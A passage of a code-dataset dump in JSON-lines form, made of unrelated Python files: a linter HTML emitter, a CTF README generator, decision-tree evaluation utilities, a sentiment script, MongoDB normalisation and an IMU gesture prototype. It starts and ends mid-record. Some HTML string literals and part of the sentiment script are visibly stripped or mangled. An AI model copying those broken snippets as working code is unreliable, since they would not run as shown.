list\r\n","repo_name":"akdenizz/GlobalAIHubPythonCourse","sub_path":"HW-Day2.py","file_name":"HW-Day2.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"7364948695","text":"\"\"\"lintswitch emitters: Parts which output the results of linting / checking.\n\"\"\"\n\nimport logging\nimport os.path\nimport datetime\n\nLOG = logging.getLogger(__name__)\n\n\ndef emit(filepath, errors, warnings, summaries):\n \"\"\"Generate HTML results. Main entry point to this module.\n \"\"\"\n\n log_emit(filepath, summaries=summaries)\n\n return html_emit(filepath,\n errors=errors,\n warnings=warnings,\n summaries=summaries)\n\n\ndef log_emit(filepath, summaries=None):\n \"\"\"Write summary to log file at DEBUG level\"\"\"\n filename = os.path.basename(filepath)\n body = []\n for name, summary in summaries.items():\n body.append(name + ': ' + summary)\n LOG.debug('%s: %s', filename, ', '.join(body))\n\n\n#--------\n# HTML formatted results\n#--------\n\nHTML_CONTENT = u\"\"\"

FILENAME

Last updated: TIME

CONTENT\"\"\"\n\n\ndef html_emit(filepath, errors=None, warnings=None, summaries=None):\n \"\"\" HTML snippet of results, for our web server to push out.\n \"\"\"\n content = []\n\n content.extend(_emit_errors(errors))\n content.extend(_emit_warnings_and_summaries(warnings, summaries))\n\n if not content:\n content = [u'All good']\n\n filename = os.path.basename(filepath)\n\n now = datetime.datetime.now()\n html = [u'

%s

' % filename]\n html.append(u'

%s
' % filepath)\n html.append(u'Last updated: %s

' % now.strftime('%A %d %b, %H:%M'))\n html.extend(content)\n\n return ''.join(html)\n\n\ndef _emit_errors(errors):\n \"\"\"Error list as array of HTML strings\"\"\"\n if not errors:\n return []\n\n content = []\n content.append(u'
')\n for name, err in errors.items():\n content.append(u'
%s
%s
' % (name, '
'.join(err)))\n content.append(u'
')\n return content\n\n\ndef _emit_warnings_and_summaries(warnings, summaries):\n \"\"\"Warnings and summaries as array of HTML strings\"\"\"\n if not warnings:\n return []\n\n content = []\n for name, warns in warnings.items():\n if not warns:\n continue\n content.append(u'
')\n\n content.append(u'

%s

' % name)\n if name in summaries:\n content.append(u'

%s

' % summaries[name])\n\n content.append(u'')\n for line in warns:\n content.append(_as_html_row(line))\n content.append(u'
')\n\n content.append(u'
')\n\n return content\n\n\ndef _as_html_row(line):\n \"\"\"Warning line as html row\"\"\"\n parts = line.split(': ')\n return u'{num}{msg}'.format(\n num=parts[0], msg=parts[1])\n","repo_name":"grahamking/lintswitch","sub_path":"lintswitch/emitters.py","file_name":"emitters.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"20"} +{"seq_id":"46677278422","text":"import os\nimport json\n\nH4TT_VERSION = \"2.3\"\n\njsons = []\noutput = \"![sreencast](poster.PNG)\\n\\n# Hack All The Things Round %s\\n\" % H4TT_VERSION\n\ndef CleanFolders():\n filenames = os.listdir (\".\")\n blacklistFolders = [\n \".git\",\n \"[template]\"\n ]\n\n folders = []\n for filename in filenames:\n if os.path.isdir(os.path.join(os.path.abspath(\".\"), filename)):\n folders.append(filename)\n\n for folder in folders:\n if folder in blacklistFolders:\n continue\n\n subFilenames = os.listdir(folder)\n subFolders = []\n for filename in subFilenames:\n if os.path.isdir(os.path.join(os.path.abspath(folder), filename)):\n subFolders.append(filename)\n\n for subFolder in subFolders:\n newName = subFolder\n\n newName = newName.lower()\n newName = newName.replace(\" \", \"_\")\n newName = newName.replace(\"-\", \"_\")\n\n os.rename(os.path.join(folder, subFolder), os.path.join(folder, newName))\n\ndef ScrapeJSON(output):\n for root, dirs, files in os.walk(\".\"):\n for file in files:\n if file.endswith(\".json\"):\n if root.split(os.sep)[1] != \"[template]\":\n jsons.append(os.path.join(root, file))\n\n categories = {}\n\n for file in jsons:\n # Skip non-challenge JSON files\n if not file.lower().endswith(\"challenge.json\"):\n continue\n\n with open(file) as thisJsonFile:\n data = json.load(thisJsonFile)\n thisCat = data['category'].lower()\n\n if thisCat not in categories:\n categories[thisCat] = {}\n\n data['INTERNAL_PATH'] = file\n categories[thisCat][data['title']] = data\n\n return categories\n\ndef BuildReadme(categories, output):\n listCat = []\n for item in categories:\n listCat.append(item)\n\n listCat.sort()\n for thisCat in listCat:\n output += \"## \" + thisCat + \"\\n\"\n\n listChallPoints = []\n for item in categories[thisCat]:\n thisChall = categories[thisCat][item]\n listChallPoints.append([int(thisChall['points']), thisChall['title']])\n \n listChallPoints.sort()\n \n for challenge in listChallPoints:\n thisChall = categories[thisCat][challenge[1]]\n output += \"[%s | %s](https://github.com/h4tt/H4TT-%s/tree/master/%s/%s)\\n\\n\" % (\n thisChall['title'],\n thisChall['points'],\n H4TT_VERSION,\n thisCat,\n thisChall['INTERNAL_PATH'].split(os.sep)[2]\n )\n return output\n\nif __name__ == \"__main__\":\n CleanFolders()\n categories = ScrapeJSON(output)\n output = BuildReadme(categories, output)\n\n text_file = open(\"README.md\", \"w\")\n text_file.write(output)\n text_file.close()\n","repo_name":"h4tt/H4TT-2.3","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"23743390297","text":"n, m = map(int, input().split())\n\na = []\npos = [[0] * n for _ in range(m)]\n\nfor i in range(m):\n tmp = [x - 1 for x in map(int, input().split())]\n # print(tmp)\n a.append(tmp)\n for j, x in enumerate(tmp): \n pos[i][x] = j\n# print(pos)\n\nprev = [-1] * m\n\nans = 0\ncnt = 0\nfor i in range(n):\n # print(prev)\n v = a[0][i]\n # print(v)\n if all(pos[j][v] == prev[j] + 1 or prev[j] == -1 for j in range(m)):\n cnt += 1\n else:\n cnt = 1\n ans += cnt\n prev = [pos[j][v] for j in range(m)]\n\nprint(ans)\n\n","repo_name":"jpswing/codes","sub_path":"1043D/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"6809267326","text":"import os\nimport pickle\nimport statistics\nimport pandas as pd\n\nimport contexts.FBDecisionTree as FBDtree\nfrom sklearn.metrics import f1_score\n\n\nclass TreeEvaluation:\n def __init__(self, tree_path):\n self.tree_path = os.path.abspath(tree_path)\n self.f_scores = dict()\n self.pandas_scores = dict()\n\n def add_evaluation(self, guess_path, dtree=None, verbose=False,\n equivalence_map=None, singletons_only=False, tree_label=None,\n compilation_label=None):\n with open(guess_path, 'rb') as f:\n guesses = pickle.load(f)\n\n if dtree is None:\n with open(self.tree_path, 'rb') as f:\n dtree = pickle.load(f)\n\n f_score = get_evaluation(dtree, guesses, equivalence_map=equivalence_map,\n singletons_only=singletons_only)\n if verbose:\n print(\"Latest F Score: {}\".format(f_score))\n\n if tree_label is not None and compilation_label is not None:\n if tree_label not in self.pandas_scores:\n self.pandas_scores[tree_label] = dict()\n\n if compilation_label not in self.pandas_scores[tree_label]:\n self.pandas_scores[tree_label][compilation_label] = list()\n\n self.pandas_scores[tree_label][compilation_label].append(f_score)\n\n\n self.f_scores[guess_path] = f_score\n if verbose:\n print(\"Average F Score: {}\".format(statistics.mean(self.f_scores)))\n\n def __str__(self):\n result = \"F Scores for {}\\n\".format(self.tree_path)\n for guess_path, f_score in self.f_scores.items():\n result += \"\\t{}: {}\\n\".format(guess_path, f_score)\n if len(self.f_scores):\n result += \"Average = {}\\n\".format(\n statistics.mean(self.f_scores.values()))\n\n return result\n\n def to_csv(self, destination):\n with open(destination, 'w') as f:\n if len(self.pandas_scores) > 0:\n averages = dict()\n for tree_label, compilation_levels in self.pandas_scores.items():\n if tree_label not in averages:\n averages[tree_label] = dict()\n for compilation_level, f_scores in compilation_levels.items():\n averages[tree_label][compilation_level] = \\\n statistics.mean(f_scores)\n df = pd.DataFrame(averages)\n df.to_csv(f)\n\n\ndef get_preds_and_truths(tree, guesses, equivalence_map=None, singletons_only=False):\n tree_funcs = list()\n for fd in tree.get_func_descs():\n tree_funcs.append(fd.name)\n\n preds = list()\n truths = list()\n unknown = \"@@UNKNOWN@@\"\n\n for fd, equiv_class in guesses.items():\n fd_name = fd.name\n if singletons_only and equiv_class is not None and len(equiv_class) > 1:\n continue\n if equivalence_map is not None and fd_name in equivalence_map:\n fd_name = equivalence_map[fd_name]\n\n if equiv_class is None:\n preds.append(unknown)\n else:\n found = False\n for ec in equiv_class:\n ec_name = ec.name\n if equivalence_map is not None and ec_name in equivalence_map:\n ec_name = equivalence_map[ec_name]\n\n if fd_name == ec_name:\n preds.append(ec_name)\n found = True\n break\n if not found:\n preds.append(ec_name)\n\n if fd_name in tree_funcs:\n truths.append(fd_name)\n else:\n truths.append(unknown)\n\n return preds, truths\n\n\ndef get_evaluation(tree, guesses, equivalence_map=None, singletons_only=False):\n preds, truths = get_preds_and_truths(tree=tree, guesses=guesses,\n equivalence_map=equivalence_map)\n return f1_score(truths, preds, average='micro')\n\n\ndef classify_guesses(tree, guesses, equivalence_map=None):\n func_names = set()\n true_pos = set()\n true_neg = set()\n labeled_known_when_unknown = set()\n labeled_unknown_when_known = set()\n labeled_incorrectly = set()\n\n for fd in tree.get_func_descs():\n func_names.add(fd.name)\n\n for func_desc, guess in guesses.items():\n if \"ifunc\" in func_desc.name:\n continue\n\n if guess is not None:\n found = False\n for ec in guess:\n if \"ifunc\" in ec.name:\n continue\n\n ec_name = ec.name\n func_desc_name = func_desc.name\n\n if equivalence_map is not None:\n if ec_name in equivalence_map:\n ec_name = equivalence_map[ec_name]\n if func_desc_name in equivalence_map:\n func_desc_name = equivalence_map[func_desc_name]\n\n if ec_name == func_desc_name:\n found = True\n break\n\n if found:\n true_pos.add(func_desc.name)\n else:\n path = get_tree_path(tree, func_desc.name)\n if len(path) > 0:\n labeled_incorrectly.add(func_desc.name)\n else:\n labeled_known_when_unknown.add(func_desc.name)\n else:\n if func_desc.name in func_names:\n labeled_unknown_when_known.add(func_desc.name)\n else:\n true_neg.add(func_desc.name)\n\n true_pos_list = list(true_pos)\n true_pos_list.sort()\n\n true_neg_list = list(true_neg)\n true_neg_list.sort()\n\n labeled_incorrectly_list = list(labeled_incorrectly)\n labeled_incorrectly_list.sort()\n\n labeled_known_when_unknown_list = list(labeled_known_when_unknown)\n labeled_known_when_unknown_list.sort()\n\n labeled_unknown_when_known_list = list(labeled_unknown_when_known)\n labeled_unknown_when_known_list.sort()\n\n return true_pos_list, true_neg_list, labeled_incorrectly_list, labeled_known_when_unknown_list, labeled_unknown_when_known_list\n\n\ndef get_tree_coverage(dtree, target_func_desc_name):\n tree_path = get_tree_path(dtree, target_func_desc_name)\n path_coverages = list()\n for node in tree_path:\n if isinstance(node, FBDtree.FBDecisionTreeInteriorNode):\n for (func_desc, coverage) in node.get_coverage().items():\n if func_desc.name == target_func_desc_name:\n path_coverages.append(coverage)\n return path_coverages\n\n\ndef get_individual_tree_coverage(dtree):\n coverages = dict()\n for func_desc in dtree.get_func_descs():\n coverages[func_desc] = get_tree_coverage(dtree, func_desc.name)\n return coverages\n\n\ndef get_full_tree_coverage(dtree):\n executed_instructions = set()\n reachable_instructions = set()\n instruction_mapping = dict()\n for func_desc in dtree.get_func_descs():\n for addr in func_desc.instructions:\n instruction_mapping[addr] = func_desc\n\n for node in dtree.get_all_interior_nodes():\n for func_desc, coverage_data in node.get_coverage().items():\n for addr in coverage_data:\n curr_func = instruction_mapping[addr]\n executed_instructions.add(addr)\n for inst in curr_func.instructions:\n reachable_instructions.add(inst)\n\n return len(executed_instructions) / len(reachable_instructions)\n\n\ndef get_tree_path(tree, func_name):\n path = list()\n path.append(tree.root)\n if _dfs_tree(func_name, path):\n return path\n path.pop()\n return path\n\n\ndef _dfs_tree(func_name, path):\n if path[-1].is_leaf():\n for ec in path[-1].get_equivalence_class():\n if ec.name == func_name:\n return True\n return False\n else:\n path.append(path[-1].get_left_child())\n if _dfs_tree(func_name, path):\n return True\n path.pop()\n path.append(path[-1].get_right_child())\n if _dfs_tree(func_name, path):\n return True\n path.pop()\n return False\n\n\ndef bin_ec_sizes(tree, max_ec_size=10):\n equiv_classes = tree.get_all_equiv_classes()\n bins = dict()\n for idx in range(1, max_ec_size + 1):\n bins[idx] = 0\n\n for ec in equiv_classes:\n ec_size = len(ec)\n if ec_size >= max_ec_size:\n bins[max_ec_size] += 1\n else:\n bins[ec_size] += 1\n\n return bins\n","repo_name":"HexHive/IOVFI","sub_path":"src/software-ethology/python/contexts/treeutils.py","file_name":"treeutils.py","file_ext":"py","file_size_in_byte":8471,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"22214192458","text":"# encoding:utf-8\nimport codecs, jieba\nimport pandas as pd\nimport re\n\nclass Analysis:\n def preteat_clause(self, phase, articlecompany):\n # 分句\n cut_list = list('。!~?!?…')\n reslist, i, start = [], 0, 0\n for word in phase:\n if word in cut_list:\n if phase[start:i] != '':\n reslist.append(phase[start:i]) # 如果这一段字符不为空,放入reslist中\n start = i + 1\n i += 1\n else:\n i += 1\n # 通过上述来控制去除cut_list内容,将划分好的语段放入reslist中\n if start < len(phase): # 说明一整段没有分隔符\n reslist.append(phase[start:])\n return [i for i in reslist if articlecompany in i] # 返回分割好的语段列表\n\n def cutwords_jieba(self, sentence, stopwords='dict/stopwords.txt'):\n l = list(jieba.cut(sentence)) # 对sentence切分之后的结果存到l中\n return l\n\n def deal_wrap(self, filedict):\n temp = []\n try:\n for x in open(filedict, 'r', encoding='utf8').readlines():\n temp.append(x.strip())\n except Exception:\n for x in open(filedict, 'r', encoding='gbk').readlines():\n temp.append(x.strip())\n return temp # 得到去除空格的字符串列表\n\n def deal_zw(self, filedict):\n temp = []\n with codecs.open(filedict, 'r+', encoding='utf8') as f:\n preline = '' # 存当前行的上一行\n for line in f:\n if not line.startswith('')\n\n with open(\"label.txt\", 'r') as f:\n lablelist = [i.replace(\"\\n\", \"\") for i in f.readlines()]\n for tempstr in a.deal_wrap('predata.txt'):\n print(i)\n if i <= 1400:\n i+=1\n continue\n sentence_pscore1, sentence_nscore1 = 0, 0\n pos = []\n neg = []\n for x in a.preteat_clause(tempstr, aclist[i]):\n # 传统方法\n c = a.cutwords_jieba(x, )\n posscore, negscore, poslist, neglist = a.sentiment(c)\n sentence_pscore1 += posscore\n sentence_nscore1 += negscore\n pos += poslist\n neg += neglist\n sentiment = sentence_pscore1 - sentence_nscore1\n s1 = 0 if sentiment > 0 else 2\n str1 = re.sub(pattern, \"\", content[i]).replace(' ', \"\").replace(\" \", \"\")\n for p in set(pos):\n str1 = str1.replace(p[0], f\"[{p[0]}]\")\n for n in set(neg):\n str1 = str1.replace(n[0], f\"{{{n[0]}}}\")\n if int(lablelist[i]) != s1:\n wrong += 1\n string += str(i) + f\":\\n{str1}\\n\" + str(sentlist[int(lablelist[i])]) + \" \" + str(sentiment) + \"\\n\"\n string += \"poslist: \" + str(pos) + \"\\n\" + \"neglist: \" + str(neg) + \"\\n\\n\"\n i += 1\n if i % 50 == 0:\n print(\"wrong:\", wrong, wrong / i)\n print(wrong, wrong / 1400)\n with open(\"debug4.txt\", \"w\") as f:\n f.write(string)\n\n'''\n400+\n256\n'''\n","repo_name":"simonZPF/ysk","sub_path":"yzk/any2.py","file_name":"any2.py","file_ext":"py","file_size_in_byte":6891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"11420026774","text":"import objc\nfrom Foundation import NSObject, NSTimer, NSRunLoop, NSDefaultRunLoopMode\nfrom AppKit import NSScreen, NSApplication, NSEvent, NSKeyDownMask\n\nclass TimerHandler(NSObject):\n def timer_callback_(self, timer):\n screens = NSScreen.screens()\n print(\"Screens:\", screens)\n\n timer_callback_ = objc.selector(timer_callback_, signature=b'v@:@')\n\ndef main():\n # Set up the timer to call the timer_callback function every second\n handler = TimerHandler.alloc().init()\n timer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(1.0, handler, handler.timer_callback_, None, True)\n\n # Add timer to the main run loop\n NSRunLoop.mainRunLoop().addTimer_forMode_(timer, NSDefaultRunLoopMode)\n\n # Set up an instance of NSApplication and activate it\n NSApp = NSApplication.sharedApplication()\n NSApp.setActivationPolicy_(0) # NSApplicationActivationPolicyRegular\n\n print(\"Press 'q' to stop the script\")\n\n # Add an event monitor to catch the key down event when 'q' is pressed\n def key_down_handler(event):\n if event.characters() == 'q':\n print(\"Exiting...\")\n NSApp.stop_(None)\n\n monitor = NSEvent.addLocalMonitorForEventsMatchingMask_handler_(NSKeyDownMask, key_down_handler)\n\n # Run the main event loop\n NSApp.run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dlucian/ScreenTrail","sub_path":"runloop.py","file_name":"runloop.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25426942936","text":"# Requires the PyMongo package.\r\n# https://api.mongodb.com/python/current\r\nimport json\r\nimport pymongo\r\n\r\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/?readPreference=primary&appname=MongoDB%20Compass&ssl=false')\r\nnumVotesThreshold = 10\r\n\r\ndb = myclient[\"mikedb\"]\r\nmymoviecol = db[\"movie2\"]\r\n\r\nmyresult = myclient['mikedb']['movie2'].aggregate([\r\n {\r\n '$match': {\r\n 'numVotes': {\r\n '$gt': numVotesThreshold\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'type': 'movie'\r\n }\r\n }, {\r\n '$match': {\r\n 'startYear': {\r\n '$gt': 1800\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'avgRating': {\r\n '$gte': 0.0\r\n }\r\n }\r\n }\r\n])\r\n\r\nminStartYear = 3000\r\nmaxStartYear = 1800\r\nminAvgRating = 10.0\r\nmaxAvgRating = 0.0\r\n\r\nfor x in myresult:\r\n #print(\"avgRating = \"+ str((x[\"avgRating\"]).to_decimal()))\r\n if(int(x[\"startYear\"]) < minStartYear):\r\n minStartYear = int(x[\"startYear\"])\r\n if(int(x[\"startYear\"]) > maxStartYear):\r\n maxStartYear = int(x[\"startYear\"])\r\n if(float(x[\"avgRating\"]) < minAvgRating):\r\n minAvgRating = float(x[\"avgRating\"])\r\n if(float(x[\"avgRating\"]) > maxAvgRating):\r\n maxAvgRating = float(x[\"avgRating\"])\r\n #print(\"trying to update \"+ str(x[\"_id\"]))\r\n #mymoviecol.find_one_and_update({\"_id\": x[\"_id\"]}, {\"$set\": {\"kmeansNorm\": [str(x[\"startYear\"]),str(x[\"avgRating\"])]}})\r\n\r\n\r\nprint(\"max avg rating = \"+str(maxAvgRating))\r\nprint(\"min avg rating = \"+str(minAvgRating))\r\nprint(\"max start Year = \"+str(maxStartYear))\r\nprint(\"min start Year = \"+str(minStartYear))\r\n\r\nmyresult = myclient['mikedb']['movie2'].aggregate([\r\n {\r\n '$match': {\r\n 'numVotes': {\r\n '$gt': numVotesThreshold\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'type': 'movie'\r\n }\r\n }, {\r\n '$match': {\r\n 'startYear': {\r\n '$gt': 1800\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'avgRating': {\r\n '$gte': 0.0\r\n }\r\n }\r\n }\r\n])\r\n\r\nfor x in myresult:\r\n currStartYear = int(x[\"startYear\"])\r\n scaledStartYear = ((currStartYear - minStartYear)*1.0)/(maxStartYear - minStartYear)\r\n currAvgRating = float(x[\"avgRating\"])\r\n scaledAvgRating = (currAvgRating - minAvgRating)/(maxAvgRating - minAvgRating)\r\n mymoviecol.find_one_and_update({\"_id\": x[\"_id\"]}, {\"$set\": {\"kmeansNorm\": [str(scaledStartYear),str(scaledAvgRating)]}})\r\n ","repo_name":"ss3398/Python","sub_path":"pymongokmeans/a8q1.py","file_name":"a8q1.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"20335270679","text":"import csv\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport re\nimport serial\nimport time\nfrom tqdm import tqdm\nimport torch\nimport sys, getopt\n\nfrom modules.dataset import *\nfrom modules.train import *\nfrom modules.utils import *\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nNUM_SAMPLES = 400\nTHRESHOLD = 0.8\n\n\ndef get_label(img, model):\n data = torch.from_numpy(img).float().to(DEVICE)\n # add batch dimension\n data = data.unsqueeze(0)\n with torch.no_grad():\n prediction = model(data)\n # print prediction as float with 2 decimals\n# np.set_printoptions(formatter={'float': lambda x: \"{0:0.2f}\".format(x)})\n# np.set_printoptions(suppress=True)\n print('Raw Prediction: ', np.around(prediction,3))\n prediction = (prediction > THRESHOLD).float()\n print('After thresholding: ', prediction)\n\n if prediction.sum() == 0:\n print('\\t \\t No prediction')\n return np.array([99]) # no label\n\n prediction = prediction.argmax(dim=1)\n\n return prediction\n\n\ndef normalize_between_0_and_1(data):\n flat_data = data.flatten()\n\n mmin_data = np.min(flat_data)\n mmax_data = np.max(flat_data)\n\n data = data - mmin_data\n data = data / (mmax_data - mmin_data)\n\n return data\n\n# plot data in 2x3 subplots\ndef plot_data_lin(macc, linacc, mgyro, lingyro):\n fig, ax = plt.subplots(2, 2)\n ax[0, 0].plot(macc)\n ax[0, 1].plot(linacc)\n ax[1, 0].plot(mgyro)\n ax[1, 1].plot(lingyro)\n\n plt.show()\n\n# create a ring buffer class\nclass RingBuffer:\n def __init__(self, size_max):\n self.gyro = [[0, 0, 0]] * size_max\n self.acc = [[0, 0, 0]] * size_max\n self.size_max = size_max\n self.cur = 0\n\n def append(self, x):\n self.acc[self.cur] = x[0:3]\n self.gyro[self.cur] = x[3:6]\n self.cur = (self.cur + 1) % self.size_max\n\n def get(self):\n \"\"\"return the buffer in chronological order\"\"\"\n return (\n self.acc[self.cur :] + self.acc[: self.cur],\n self.gyro[self.cur :] + self.gyro[: self.cur],\n )\n\n# create a class to read the data from the serial port\nclass SerialData:\n def __init__(self, serial_port=\"/dev/ttyACM0\", serial_baud=115200):\n self.ser = serial.Serial(serial_port, serial_baud)\n self.buffer = RingBuffer(1000)\n\n def update(self):\n data = []\n buffer = []\n while len(buffer) < 6:\n buffer = self.ser.read(self.ser.inWaiting())\n\n recent_data = buffer.decode(\"utf-8\").splitlines()\n\n data = []\n for i in recent_data:\n data = [float(s) for s in re.findall(r\"-?\\d+\\.?\\d*\", i)]\n if len(data) == 6:\n self.buffer.append(data)\n# print(data)\n\n return len(recent_data)\n\n def get_buffer(self):\n return self.buffer.get()\n\n def get_last_n_samples(self, n):\n acc, gyro = self.buffer.get()\n acc = np.array(acc)\n gyro = np.array(gyro)\n\n return acc[-n:], gyro[-n:]\n\n\nclass CurrentEstimate:\n def __init__(self):\n self.gravity_vector = np.array([0.0,0.0,0.0])\n self.velocity = np.array([0, 0, 0])\n \n def estimate_gravity_vector(self, acc, new_samples):\n samples = np.min([100, new_samples])\n self.gravity_vector = np.mean(acc[-samples:], axis=0)\n# print(\"gravity vector: \", self.gravity_vector)\n\n def estimate_velocity(self, acc, new_samples):\n self.estimate_gravity_vector(acc, new_samples)\n dt = 1 / 200\n self.velocity = np.zeros(3)\n\n # I assume that the board is always parallel to the ground\n self.gravity_vector = np.array([0, 0, 980.0])\n self.velocity = np.sum(acc[-new_samples:], axis=0) * dt - self.gravity_vector * dt * new_samples\n\n\n def get_estimate(self):\n return self.position, self.velocity, self.orientation\n\n\n def isMoving(self):\n if np.linalg.norm(self.velocity) > 10.0: # 1.0 for normal velocity, 0.1 for average velocity\n print(\"norm: \", np.linalg.norm(self.velocity))\n return True\n else:\n return False\n\n\n\nif __name__ == \"__main__\":\n print(f'Using device: {DEVICE}')\n ser = SerialData()\n current_estimate = CurrentEstimate()\n\n img_size = math.ceil(math.sqrt(NUM_SAMPLES))\n\n labels_map = get_labels_map()\n reverse_labels_map = {v: k for k, v in labels_map.items()}\n\n num_classes = len(labels_map)\n model = get_model(num_classes, DEVICE)\n print(model)\n model.load_state_dict(torch.load('results/model.pth'))\n model.eval()\n\n\n print(\"Rdy? go!\")\n while True:\n time.sleep(0.05)\n new_samples = ser.update()\n# print(\"new samples: \", new_samples)\n acc, gyro = ser.get_last_n_samples(new_samples)\n\n current_estimate.estimate_velocity(acc, new_samples)\n# print(\"acc shape: \", np.shape(acc))\n if current_estimate.isMoving() == False:\n continue\n print('--------------------------------------')\n print(\"I am moving\")\n\n # measure execution time \n start_time = time.time()\n new_samples = 0\n while( new_samples < NUM_SAMPLES):\n new_samples += ser.update()\n# print(\"new samples: \", new_samples)\n# time.sleep(1)\n\n stop_time = time.time()\n print(\"time: \", stop_time - start_time)\n# print(\"show measurements\")\n\n acc, gyro = ser.get_last_n_samples(NUM_SAMPLES)\n# print(\"acc shape: \", np.shape(acc))\n# print(\"gyro shape: \", np.shape(gyro))\n\n nacc = normalize_between_0_and_1(acc)\n ngyro = normalize_between_0_and_1(gyro)\n\n# plot_data_lin(nacc, acc, ngyro, gyro)\n\n data = np.concatenate((nacc, ngyro), axis=1)\n data_img = data2image(data)\n label = get_label(data_img, model)\n if label[0] != 99:\n print('Predicted label: ', reverse_labels_map[label[0].item()])\n\n","repo_name":"daleonpz/stwin_AI_vowel_recognition","sub_path":"trainer/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"47735545942","text":"from bs4 import BeautifulSoup\nimport pandas, requests, lxml\nfrom spotify import create_playlist\n#https://www.billboard.com/charts/hot-100/2002-07-20\n\nwhile True:\n try:\n year=str(input('Enter the Year YYYY : '))\n URL = f\"https://www.billboard.com/charts/hot-100/{year}-{str(input('Enter the Month MM : '))}-{str(input('Enter the Day DD: '))}\"\n response = requests.get(url=URL)\n response.raise_for_status()\n webpage = response.text\n soup = BeautifulSoup(webpage, \"html.parser\")\n break\n except :\n print(\"Invalid Date please enter it in the right format YYYY-MM-DD\")\n\n\n\n\n# print(soup.prettify())\nsongs=soup.find_all(name=\"span\",class_=\"chart-element__information__song text--truncate color--primary\")#soup.select(selector=\"button span span\")\nplaylist=[]\nyears=[]\nfor song in songs:\n playlist.append(song.string)\n years.append(year)\n\nsong_dict={\"Songs\":playlist,\n \"Year\":years\n\n }\ndata=pandas.DataFrame(song_dict)\ndata.to_csv(f\"Top-100-songs-in-{year}.csv \")\ncreate_playlist(playlist,year)\n","repo_name":"omar-sherif9992/Pythonist","sub_path":"Projects/Soup_apps/spotify_playlist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"16799254829","text":"import numpy as np\nimport corner\nimport matplotlib.pyplot as plt\n\ndirs = ['../Torch/outputbasic',\n'../Torch/outputbasicLineNo',\n'../Torch/outputbasicLineNoP',\n'../Torch/outputbasicP',\n'../Torch/outputbi',\n'../Torch/outputbiLineNo',\n'../Torch/outputbiLineNoP',\n'../Torch/outputbiP',]\n\nfiles = ['ag.summary','ug.summary']\n\n\n#allData = np.array()\nmetrics = ['emptyPercentage', 'negativeSpace', 'decorationPercentage', 'pathPercentage', 'leniency', 'linearity', 'jumps', 'meaningfulJumps']\nprettyNames = {'emptyPercentage':r\"$e$\", 'negativeSpace':'$n$', 'decorationPercentage':'$d$', 'pathPercentage':'$p$', 'leniency':'$l$', 'linearity':'$R^2$', 'jumps':'$j$', 'meaningfulJumps':'$j_i$', 'length':'$s$'}\n\ndef formatData(file):\n my_data = np.genfromtxt(file, delimiter=',')\n with open(file,'r') as openfile:\n line = openfile.readline().rstrip()\n items = line.split(',')\n metricToIndex = {items[ii]:ii for ii in range(len(items))}\n \n columns = [metricToIndex[metric] for metric in metrics]\n data = my_data[1:,columns]\n data =data[data[:,3] > -1,:]\n labels = [prettyNames[metric] for metric in metrics]\n\n return (data,labels)\noriginals,_ = formatData('originals.summary')\nallData = originals\nfile2dat = {}\nfor dir in dirs:\n combined = None\n for file in files:\n data,labels = formatData('{}/{}'.format(dir,file))\n if allData is None:\n allData = data\n else:\n allData = np.concatenate([allData,data])\n if combined is None:\n combined = data\n else:\n combined = np.concatenate([combined,data])\n \n #figure = corner.corner(data,labels=labels,quantiles=[0.16, 0.5, 0.84])\n #figure.savefig('{}{}.png'.format(dir,file))\n file2dat['{}{}'.format(dir,file)] = (data,labels)\n file2dat['{}'.format(dir)] = (combined,labels)\n \nrange = [[allData[:,ii].min(), allData[:,ii].max()] for ii in range(allData.shape[1])]\nfor file in file2dat:\n figure = corner.corner(file2dat[file][0],labels=labels,range=range)\n figure.savefig('{}.png'.format(file))\n plt.close()\nfigure = corner.corner(originals,labels=labels,range=range)\nfigure.savefig('originals.png'.format(file))\nplt.close()\n","repo_name":"adamsumm/SMBRNN","sub_path":"Test/makePlots.py","file_name":"makePlots.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34144103048","text":"'''Training script for the regular flat FarmingEnv'''\n\nfrom collections import Counter\nimport argparse\nimport os\nfrom typing import Dict, Any, Union\nimport pprint\n\nimport numpy as np\nimport ray\nfrom ray import tune, air\nfrom ray.rllib.algorithms.appo import APPOConfig\nfrom ray.rllib.examples.models.action_mask_model import TorchActionMaskModel\nfrom ray.rllib.algorithms.callbacks import DefaultCallbacks\nfrom ray.rllib.evaluation import Episode\nfrom ray.rllib.evaluation.episode_v2 import EpisodeV2\nfrom ray.rllib.policy.sample_batch import 